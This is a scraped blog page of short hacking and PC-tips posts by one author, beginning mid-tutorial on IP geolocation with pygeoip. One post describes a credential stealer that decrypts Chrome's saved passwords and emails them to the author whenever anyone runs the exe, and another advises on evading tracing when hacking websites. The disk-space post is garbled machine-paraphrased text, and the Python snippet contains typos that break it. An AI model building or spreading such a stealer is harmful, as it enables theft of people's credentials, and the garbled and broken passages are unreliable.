Now we need to download the database from MaxMind, and we can get it by typing the following.
kali > wget -N -q http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
Then we need to unzip it.

kali> gzip -d GeoLiteCity.dat.gz

Let's now check that the database is in place by listing the directory.
kali > ls -alh GeoLiteCity.dat



​Step 3

Download & Install Pygeoip

Next, we need to install the Python script to read the database, pygeoip. We can download it by typing the following.

kali > wget http://pygeoip.googlecode.com/files/pygeoip-0.1.3.zip

​Then, unzip it.
kali > unzip pygeoip-0.1.3.zip

​We next need to download some setup tools into the pygeoip directory.
kali > cd /pygeoip-0.1.3

kali > wget http://svn.python.org/projects/sandbox/trunk/setuptools/ez_setup.py

kali > wget http://pypi.python.org/packages/2.5/s/setuptools-0.6c11-py2.5.egg

​Let's now move and then build and install the setup tools.

kali > mv setuptools-0.6c11-py2.5.egg setuptools-0.7a1-py2.5.egg
kali > python setup.py build
kali > python setup.py install

We need to move the database to the pygeoip directory so that script can access it without having to use the full path.
kali > mv GeoLiteCity.dat /pygeoip-0.1.3/GeoLiteCity.dat

​Step 4

Query the Database

Now that we have the database in place and the pygeoip script downloaded and installed, we can begin to query that database with pygeoip.
First, we need to start a Python shell.
kali > python
Then, you will be greeted will the triple >>> indicating you are now in an interactive python shell. Let's import the module and instantiate the class.

>>>import pygeoip
>>>gip = pygeopip.GeoIP('GeoLiteCity.dat')
Next, we are ready to begin our query. Let's see where Google is located.
>>>rec = gip.record_by_addr('64.233.161.99')
>>>for key.val in rec.items():
... print "%s: %s" %(key,val)
...
Please note that it is critical to indent the "print". If not, you will throw an error.



​As you can see, we were able to locate Google's IP in Mountain View, CA at area code 650, postal code 94043, longitude -122.0574, and latitude 37.4192. Not bad! Now, let's try to locate the IP of cnn.com.

➡️ Once again, the combination of the database and pygeoip script was able to provide us with key location information on CNN's IP address.

➡️ This little tool is great for locating any IP address in the world, albeit, it is a bit clunky. Maybe someone here in the Null Byte community with good Python skills would like to write an interactive script with a nice user interface where the user can simply enter the IP and get the record information.


SHARE THIS POST

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author:SilentKiller

5 New Ways To Free Up Hard Disk Space On Windows



➖➖➖➖➖➖➖➖➖➖➖➖
✅ I have mentioned all the 5 possible ways just right below after doing my personal research on this and using these methods on my personal laptop so that I can get to know the methods that actually work. So follow these ways and get the space free.



🔵 Erasing garbage documents effectively through Storage sense in Windows 10

⚜ Capacity sense is a rich element that gives a simple method to rapidly erase garbage documents from a hard drive, for example, past establishment and transitory records to free up space to store more basic substance and enhance framework execution.

🔵 Circle Cleanup strategy to Remove Junk Files

⚜ Circle Cleanup is an apparatus that has been intended to give clients a more granular control to erase pointless documents from a hard drive, and beginning with Windows 10 variant 1803 (April 2019 Update), you can expel similar things utilizing Control Panel and Settings application.

🔵 Uninstall Unnecessary applications/diversions

⚜ Uninstalling applications that you don’t utilize, for example, those applications that came preinstalled when you bought your gadget, or those you introduced however never utilized is another extraordinary method to free up space on Windows 10. Furthermore, present-day amusements that downloaded into your machine, for the most part, can rapidly top off your hard drive, all things considered, you need to keep the number of introduced recreations to the base — to recover capacity as well as to enhance gaming execution.

🔵 Store records in the Cloud

⚜ On the off chance that you utilize Microsoft’s OneDrive distributed storage benefit, you can likewise spare nearby capacity utilizing the Files On-Demand feature. OneDrive Files On-Demand is an element that enables you to get to your records, photographs, recordings, and music put away in the cloud utilizing File Explorer, yet without matching up to them or utilize a lot of neighborhood stockpiling. At the point when the hard drive is running low on space, you can utilize this space-sparing component to transfer and keep your documents in the cloud and download them just when you require them. I suggest you guys to Google drive as that is the best service that even I’m using right now.

🔵 Kill Hibernation-Windows 10 Feature

⚜ On Windows 10, Hibernation is a component that spares the information in memory to the hard drive permitting to control off your gadget totally without losing your work. At that point when your gadget returns on, you can get exactly the latest relevant point of interest.

✅ End Here in this article we have expounded on the 5 New Ways To Free Up Hard Disk Space On Windows. Through utilizing these ways anybody can have the capacity to keep their windows stockpiling perfect and even receive more space in return. All these ways are the best methods for cleaning the circle space and on the off chance that you will get the most helpful outcomes, attempt up any of these strategies from the article. The expectation that you would have enjoyed the data given on this post. In the event that it is along these lines, it would be ideal if you share it more with others. To share the remarks for this article go to the remarks box that is given underneath. Finally, in any case, a debt of gratitude is in order for perusing this post.
➖➖➖➖➖➖➖➖➖➖➖➖

SHARE THIS POST

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author:SilentKiller

Chrome password stealing



In simple terms the script is self explanatory and goes to:

-"%APPDATA%\..\Local\Google\Chrome\User Data\Default\Login Data"
where the passwords and usernames are stored
-decrypt them
-and prints the list of usernames and passwords

Step 1My Remote Function

Of course I couldn't resist to modify this script and to add a function that takes the list, stores It to a txt file and send It via gmail wherever I want to.

So If anyone on any machine clicks this script(exe) then all his google chrome credentials will be sent to a gmail account.

Step Github Script

Github script (Chrome-Venom) is on my github account https://github.com/Ierofantis/Chrome_Venom and read carefully the README.md file...

SHARE THIS POST

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author:SilentKiller

Hᴏᴡ Tᴏ Rᴇᴘᴀɪʀ Cᴏʀʀᴜᴘᴛᴇᴅ Mᴇᴍᴏʀʏ Cᴀʀᴅ/USB Pᴇɴ Dʀɪᴠᴇ



✨ Tʜᴇ Mᴇᴛʜᴏᴅ ɪs ʙᴀsᴇᴅ ᴏɴ ᴀɴ ᴜɴᴄᴏᴍᴘʟɪᴄᴀᴛᴇᴅ ᴄᴏᴍᴍᴀɴᴅ ᴘʀᴏᴍᴘᴛ ᴛʀɪᴄᴋ ᴛʜᴀᴛ ᴡɪʟʟ ғᴏʀᴄᴇ ғᴏʀᴍᴀᴛ ʏᴏᴜʀ ᴇxᴛᴇʀɴᴀʟ ᴅʀɪᴠᴇ,  ᴀɴᴅ ᴛʜᴇɴ ʏᴏᴜ ᴄᴀɴ ᴜsᴇ ɪᴛ sᴍᴏᴏᴛʜʟʏ ᴀɴᴅ ᴇʀʀᴏʀ-ғʀᴇᴇ. Hᴏᴡᴇᴠᴇʀ, ɴᴏᴛᴇ ᴛʜᴀᴛ ᴛʜɪs ᴡɪʟʟ ᴅᴇʟᴇᴛᴇ ᴀʟʟ ʏᴏᴜʀ ғɪʟᴇs ғʀᴏᴍ USB ᴘᴇɴ ᴅʀɪᴠᴇ ᴀɴᴅ ɪғ ʏᴏᴜ ʜᴀᴠᴇ ᴀɴʏ ɪᴍᴘᴏʀᴛᴀɴᴛ ᴅᴀᴛᴀ, Tʜᴇɴ ᴜsᴇ ᴛʜᴇ Rᴇᴄᴏᴠᴇʀʏ Tᴏᴏʟ ᴛᴏ ʀᴇsᴛᴏʀᴇ ᴛʜᴇsᴇ ᴅᴀᴛᴀ ʙᴇғᴏʀᴇ ɪᴍᴘʟᴇᴍᴇɴᴛɪɴɢ ᴛʜɪs ᴍᴇᴛʜᴏᴅ. Sᴏ ᴊᴜsᴛ ғᴏʟʟᴏᴡ ᴛʜᴇ sɪᴍᴘʟᴇ sᴛᴇᴘs ᴛʜᴀᴛ I ʜᴀᴠᴇ ᴅɪsᴄᴜssᴇᴅ ʙᴇʟᴏᴡ.



🏅 Tᴏᴘ 3 Mᴇᴛʜᴏᴅs ᴛᴏ Rᴇᴘᴀɪʀ:

1️⃣ Cᴏɴɴᴇᴄᴛ Tʜᴇ USB Dᴇᴠɪᴄᴇ Tᴏ Oᴛʜᴇʀ Cᴏᴍᴘᴜᴛᴇʀ.

-> Wᴇʟʟ, ᴡᴇ ᴍᴏsᴛʟʏ ғᴀᴄᴇ SD ᴄᴀʀᴅ ᴏʀ Pᴇɴᴅʀɪᴠᴇ ɪssᴜᴇs ᴅᴜᴇ ᴛᴏ ᴛʜᴇ ɪɴᴄᴏᴍᴘᴀᴛɪʙɪʟɪᴛʏ ᴏʀ ᴀɴʏ ᴏᴛʜᴇʀ ᴅʀɪᴠᴇʀ ʀᴇʟᴀᴛᴇᴅ ɪssᴜᴇ. Sᴏ, ʙᴇғᴏʀᴇ ʏᴏᴜ ᴄᴏɴᴄʟᴜᴅᴇ ᴛʜᴀᴛ ʏᴏᴜʀ USB ᴏʀ SD ᴄᴀʀᴅ ɪs ᴅᴀᴍᴀɢᴇᴅ ᴀɴᴅ ɪᴛs ᴜsᴇʟᴇss, ᴛʀʏ ᴛᴏ ᴄᴏɴɴᴇᴄᴛ ɪᴛ ᴡɪᴛʜ ᴏᴛʜᴇʀ ᴅᴇᴠɪᴄᴇs. Iғ ᴛʜᴇ USB ᴅᴇᴠɪᴄᴇ ᴡᴏʀᴋs ғɪɴᴇ ᴏɴ ᴏᴛʜᴇʀ ᴅᴇᴠɪᴄᴇs, ᴛʜᴇɴ ʏᴏᴜ ɴᴇᴇᴅ ᴛᴏ ᴡᴏʀᴋ ᴏɴ ʏᴏᴜʀ ᴄᴏᴍᴘᴜᴛᴇʀ ʀᴀᴛʜᴇʀ ᴛʜᴀɴ USB ᴏʀ SD ᴄᴀʀᴅ. Sᴏ, ᴛʜɪs ɪs ᴛʜᴇ ᴠᴇʀʏ ғɪʀsᴛ sᴛᴇᴘ ᴛʜᴀᴛ ʏᴏᴜ sʜᴏᴜʟᴅ ᴛᴀᴋᴇ ᴛᴏ ᴄʜᴇᴄᴋ ᴏʀ ʀᴇᴘᴀɪʀ ʏᴏᴜʀ SD ᴄᴀʀᴅ ᴏʀ USB ғʟᴀsʜ ᴅʀɪᴠᴇ.

2️⃣ Usɪɴɢ Tʀᴏᴜʙʟᴇsʜᴏᴏᴛᴇʀ.

-> Wᴇʟʟ, ᴛʀᴏᴜʙʟᴇsʜᴏᴏᴛᴇʀ ɪs ᴛʜᴇ ʙᴇsᴛ ᴡᴀʏ ᴛᴏ sʜᴏʀᴛ ᴏᴜᴛ ᴀɴʏ ᴋɪɴᴅ ᴏғ Hᴀʀᴅᴡᴀʀᴇ ᴘʀᴏʙʟᴇᴍ. Yᴏᴜ ᴊᴜsᴛ ɴᴇᴇᴅ ᴛᴏ 'Tʀᴏᴜʙʟᴇsʜᴏᴏᴛɪɴɢ' ɪɴ ᴛʜᴇ sᴛᴀʀᴛ ᴍᴇɴᴜ ᴀɴᴅ ᴛʜᴇɴ ᴜɴᴅᴇʀ 'Hᴀʀᴅᴡᴀʀᴇ ᴀɴᴅ Sᴏᴜɴᴅ' sᴇʟᴇᴄᴛ ᴛʜᴇ ᴏᴘᴛɪᴏɴ 'Cᴏɴғɪɢᴜʀᴇ ᴀ Dᴇᴠɪᴄᴇ' ᴀɴᴅ ғᴏʟʟᴏᴡ ᴛʜᴇ ᴏɴ sᴄʀᴇᴇɴ ɪɴsᴛʀᴜᴄᴛɪᴏɴ ᴛᴏ sᴏʀᴛ ᴏᴜᴛ ᴀɴʏ ᴘʀᴏʙʟᴇᴍ ʀᴇɢᴀʀᴅɪɴɢ USB ᴅᴇᴠɪᴄᴇ ᴏʀ ᴏᴛʜᴇʀ ʜᴀʀᴅᴡᴀʀᴇ.

3️⃣ Uᴘᴅᴀᴛɪɴɢ USB Dʀɪᴠᴇʀ.

🔰 Iғ Wɪɴᴅᴏᴡs ғᴀɪʟᴇᴅ ᴛᴏ ʀᴇᴀᴅ ʏᴏᴜʀ USB ᴅʀɪᴠᴇ ᴛʜᴇɴ ᴏᴜᴛᴅᴀᴛᴇᴅ ᴅʀɪᴠᴇʀs ᴍɪɢʜᴛ ʙᴇ ᴀɴᴏᴛʜᴇʀ ʀᴇᴀsᴏɴ. Wᴇʟʟ, sᴏᴍᴇᴛɪᴍᴇs ᴜᴘᴅᴀᴛɪɴɢ ᴛʜᴇ ᴅᴇᴠɪᴄᴇ ᴅʀɪᴠᴇʀ ᴄᴏᴜʟᴅ ғɪx ᴀɴʏ ᴇxɪsᴛɪɴɢ ᴘʀᴏʙʟᴇᴍ. Hᴇʀᴇ's ʜᴏᴡ ʏᴏᴜ ᴄᴀɴ ᴜᴘᴅᴀᴛᴇ ᴛʜᴇ ᴅᴇᴠɪᴄᴇ ᴅʀɪᴠᴇʀs,

-> Fɪʀsᴛ ᴏғ ᴀʟʟ, ʏᴏᴜ ɴᴇᴇᴅ ᴛᴏ ᴏᴘᴇɴ ᴛʜᴇ RUN ʙᴏx ᴀɴᴅ ᴛʜᴇɴ ᴛʏᴘᴇ ɪɴ ᴅᴇᴠᴍɢᴍᴛ.ᴍsᴄ . Iᴛ ᴡɪʟʟ ᴏᴘᴇɴ ᴜᴘ ᴛʜᴇ Dᴇᴠɪᴄᴇ Mᴀɴᴀɢᴇʀ

-> Nᴏᴡ ʏᴏᴜ ɴᴇᴇᴅ ᴛᴏ ᴇxᴘᴀɴᴅ ᴛʜᴇ Uɴɪᴠᴇʀsᴀʟ Sᴇʀɪᴀʟ Bᴜs Cᴏɴᴛʀᴏʟʟᴇʀs. Hᴇʀᴇ ʏᴏᴜ ᴡɪʟʟ sᴇᴇ ᴛʜᴇ ᴄᴏʀʀᴜᴘᴛᴇᴅ ᴏʀ ᴜɴʀᴇᴄᴏɢɴɪsᴇᴅ USB ᴅᴇᴠɪᴄᴇs ᴀs 'ᴜɴᴋɴᴏᴡɴ Dᴇᴠɪᴄᴇs'.

-> Rɪɢʜᴛ ᴄʟɪᴄᴋ ᴏɴ ᴛʜᴇ 'Uɴᴋɴᴏᴡɴ Dᴇᴠɪᴄᴇs' ᴀɴᴅ ᴛʜᴇɴ ʏᴏᴜ ᴡɪʟʟ sᴇᴇ ᴛʜᴇ ᴏᴘᴛɪᴏɴ ᴏғ Uᴘᴅᴀᴛᴇ Dʀɪᴠᴇʀ, ᴄʟɪᴄᴋ ᴏɴ ᴛʜᴀᴛ.

⭕ Nᴏᴡ ɪғ ʏᴏᴜ ɴᴇᴇᴅᴇᴅ ᴀɴ ɴᴇᴄᴇssᴀʀʏ ᴜᴘᴅᴀᴛᴇ ɪᴛ ᴡɪʟʟ ʟᴇᴛ ʏᴏᴜ ᴋɴᴏᴡ. Sɪᴍᴘʟʏ ᴜᴘᴅᴀᴛᴇ ɪᴛ ᴀɴᴅ ɪᴛ ᴡɪʟʟ ғɪx ᴀɴʏ ᴇxɪsᴛɪɴɢ ᴘʀᴏʙʟᴇᴍ.


SHARE THIS POST

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author:SilentKiller

How To Change Your Ip In Less Then 1 Minute.



1. Click on "Start" in the bottom   left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit ok



✨ You should now be at an MSDOS prompt screen.

4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"

✨ You Should Now Be On A Screen With Something Titled "Local Area Connection", Or Something Close To That, And, If You Have A Network Hooked Up, All Of Your Other Networks.

8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab.
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here.
14. Hit the "Ok" button again.

✨ You should now be back to the "Local Area Connection" screen.

15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings.
17. This time, select "Obtain an IP address automatically" tongue.gif
18. Hit "Ok"
19. Hit "Ok" again.
20. You now have a new IP address.


✨ With a little practice, you can easily get this process down to 15 seconds.

NOTE 👇

This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back.


SHARE THIS POST

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author:SilentKiller

ʜᴏᴡ ᴛᴏ ʀᴇᴄᴏᴠᴇʀ ᴅᴇʟᴇᴛᴇᴅ ᴍᴇssᴀɢᴇs ᴏɴ ᴀɴᴅʀᴏɪᴅ




sᴛᴇᴘ 1. ғɪʀsᴛ ᴏғ ᴀʟʟ ɪɴ ʏᴏᴜʀ ᴡɪɴᴅᴏᴡs ᴘᴄ ᴅᴏᴡɴʟᴏᴀᴅ ᴀɴᴅ ɪɴsᴛᴀʟʟ ᴛʜᴇ ᴛᴏᴏʟ ᴀɴᴅʀᴏɪᴅ ᴅᴀᴛᴀ ʀᴇᴄᴏᴠᴇʀʏ.

sᴛᴇᴘ 2. ɴᴏᴡ ʏᴏᴜ ʜᴀᴠᴇ ᴛᴏ ᴇɴᴀʙʟᴇ ᴜsʙ ᴅᴇʙᴜɢɢɪɴɢ ɪɴ ʏᴏᴜʀ ᴀɴᴅʀᴏɪᴅ ғᴏʀ ᴛʜᴀᴛ ʏᴏᴜ ʜᴀᴠᴇ ᴛᴏ ɢᴏ ᴛᴏ sᴇᴛᴛɪɴɢs -> ᴀʙᴏᴜᴛ ᴘʜᴏɴᴇ -> ʙᴜɪʟᴅ ɴᴜᴍʙᴇʀ ᴀɴᴅ ᴛᴀᴘ ᴏɴ ɪᴛ 7-10 ᴛɪᴍᴇs. ɴᴏᴡ ʏᴏᴜ ᴡɪʟʟ sᴇᴇ ᴅᴇᴠᴇʟᴏᴘᴇʀ ᴏᴘᴛɪᴏɴ ɪɴ ʏᴏᴜʀ sᴇᴛᴛɪɴɢs ᴀɴᴅ ᴛᴀᴘ ᴏɴ ɪᴛ ᴀɴᴅ sᴄʀᴏʟʟ ᴅᴏᴡɴ ᴀɴᴅ ᴇɴᴀʙʟᴇ ᴜsʙ ᴅᴇʙᴜɢɢɪɴɢ



sᴛᴇᴘ 3. ɴᴏᴡ ʟᴀᴜɴᴄʜ ᴛʜᴇ ᴛᴏᴏʟ ᴛʜᴀᴛ ʏᴏᴜ ɪɴsᴛᴀʟʟᴇᴅ ɪɴ ʏᴏᴜʀ ᴘᴄ ᴀɴᴅ ғʀᴏᴍ ᴛʜᴇʀᴇ sᴇʟᴇᴄᴛ ʏᴏᴜʀ ᴀɴᴅʀᴏɪᴅ ᴠᴇʀsɪᴏɴ ᴀɴᴅ ᴘʀᴏᴄᴇᴇᴅ ʙʏ ᴄᴏɴɴᴇᴄᴛɪɴɢ ʏᴏᴜʀ ᴀɴᴅʀᴏɪᴅ ᴛᴏ ʏᴏᴜʀ ᴘᴄ ᴠɪᴀ ᴜsʙ ᴄᴀʙʟᴇ. ɴᴏᴡ sᴇʟᴇᴄᴛ ᴛʜᴇ ᴍᴇssᴀɢᴇs ᴀᴛ ᴛʜᴇ ʀᴇᴄᴏᴠᴇʀʏ sᴇᴄᴛɪᴏɴ ᴀɴᴅ ᴛʜᴇɴ sɪᴍᴘʟʏ ᴄʟɪᴄᴋ ᴏɴ ɴᴇxᴛ.

sᴛᴇᴘ 4. ɴᴏᴡ ᴛʜᴇ ᴀɴᴅʀᴏɪᴅ ᴅᴀᴛᴀ ʀᴇᴄᴏᴠᴇʀʏ sᴏғᴛᴡᴀʀᴇ ᴡɪʟʟ ᴀsᴋ ʏᴏᴜ ᴛᴏ ᴀʟʟᴏᴡ/ɢʀᴀɴᴛ/ ᴀᴜᴛʜᴏʀɪᴢᴇ ᴛʜᴇ ᴀᴄᴄᴇss ɪɴ ᴏʀᴅᴇʀ ᴛᴏ ɢᴇᴛ ᴛʜᴇ ᴘʀɪᴠɪʟᴇɢᴇ ᴛᴏ sᴄᴀɴ sᴍs ᴅᴀᴛᴀ. sɪᴍᴘʟʏ ᴀʟʟᴏᴡ ɪᴛ

sᴛᴇᴘ 5. ɴᴏᴡ ᴀғᴛᴇʀ ᴛʜᴇ sᴄᴀɴ ɢᴇᴛs ᴄᴏᴍᴘʟᴇᴛᴇᴅ ʏᴏᴜ ᴡɪʟʟ sᴇᴇ ᴀʟʟ ᴛʜᴇ ᴅᴇʟᴇᴛᴇᴅ ᴛᴇxᴛ ᴍᴇssᴀɢᴇs ғʀᴏᴍ ᴛʜᴇ ᴀɴᴅʀᴏɪᴅ ᴅᴇᴠɪᴄᴇ, ᴄʟɪᴄᴋ ᴏɴ ᴛʜᴇ ɪᴛᴇᴍs ʏᴏᴜ ᴡᴀɴᴛ ᴛᴏ ʀᴇsᴛᴏʀᴇ ᴀɴᴅ ᴛʜᴇɴ ᴄʟɪᴄᴋ ᴏɴ “ʀᴇᴄᴏᴠᴇʀ” ʙᴜᴛᴛᴏɴ.

ᴛʜᴀᴛ’s ɪᴛ! ʏᴏᴜ ᴀʀᴇ ᴅᴏɴᴇ, ɴᴏᴡ ᴛʜᴇ ʀᴇsᴛᴏʀɪɴɢ ᴘʀᴏᴄᴇss ᴡɪʟʟ ʙᴇɢɪɴ ᴀɴᴅ ᴀʟʟ ʏᴏᴜʀ ᴍᴇssᴀɢᴇs ᴡɪʟʟ ɢᴇᴛ ʀᴇᴄᴏᴠᴇʀ.

SHARE THIS POST

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author:SilentKiller